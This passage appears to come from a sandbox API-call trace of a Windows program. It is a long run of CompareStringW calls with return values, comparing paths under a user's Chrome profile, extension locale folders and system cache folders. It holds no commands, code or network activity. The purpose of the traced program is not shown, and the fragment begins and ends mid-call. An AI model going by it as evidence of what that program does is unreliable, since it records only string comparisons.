lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\", cchCount2=130) returned 1 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\", cchCount2=130) returned 3 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\", cchCount2=131) returned 1 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\", cchCount2=131) returned 3 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\", cchCount2=131) returned 1 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\", cchCount2=131) returned 1 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\", cchCount2=131) returned 1 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\", cchCount2=130) returned 1 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\", cchCount2=130) returned 1 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\", cchCount2=130) returned 1 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\", cchCount2=130) returned 3 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\", cchCount2=130) returned 3 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\", cchCount2=130) returned 1 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\", cchCount2=130) returned 1 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\", cchCount2=130) returned 1 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\", cchCount2=130) returned 1 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\", cchCount2=130) returned 1 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\", cchCount1=130, lpString2="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", cchCount2=72) returned 3 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount1=84, lpString2="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", cchCount2=72) returned 3 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\", cchCount1=116, lpString2="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", cchCount2=72) returned 1 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=68, lpString2="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", cchCount2=72) returned 3 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\", cchCount2=130) returned 1 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\", cchCount2=130) returned 3 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\", cchCount2=130) returned 3 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\", cchCount2=130) returned 3 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\", cchCount1=130, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\", cchCount2=34) returned 3 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount1=84, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\", cchCount2=34) returned 3 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\", cchCount1=116, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\", cchCount2=34) returned 1 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=68, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\", cchCount2=34) returned 3 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", cchCount1=72, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\", cchCount2=34) returned 1 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\", cchCount2=130) returned 1 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\", cchCount2=130) returned 1 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\", cchCount2=130) returned 3 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\", cchCount2=130) returned 1 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\", cchCount2=130) returned 1 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\", cchCount2=130) returned 3 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\", cchCount2=130) returned 1 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\", cchCount2=130) returned 1 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\", cchCount2=130) returned 3 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\", cchCount2=130) returned 3 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\", cchCount2=135) returned 1 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\", cchCount2=135) returned 3 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\", cchCount2=135) returned 1 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\", cchCount2=135) returned 1 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\", cchCount2=135) returned 1 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\", cchCount2=130) returned 1 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\", cchCount1=135, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\", cchCount2=130) returned 3 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\", cchCount2=130) returned 1 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\", cchCount2=130) returned 3 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\", cchCount2=130) returned 3 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\", cchCount2=131) returned 1 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\", cchCount1=135, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\", cchCount2=131) returned 1 [0276.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\", cchCount2=131) returned 3 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\", cchCount2=131) returned 3 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\", cchCount2=131) returned 1 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\", cchCount2=130) returned 1 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\", cchCount2=130) returned 1 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\", cchCount2=130) returned 1 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\", cchCount2=130) returned 1 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\", cchCount2=130) returned 1 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\", cchCount1=130, 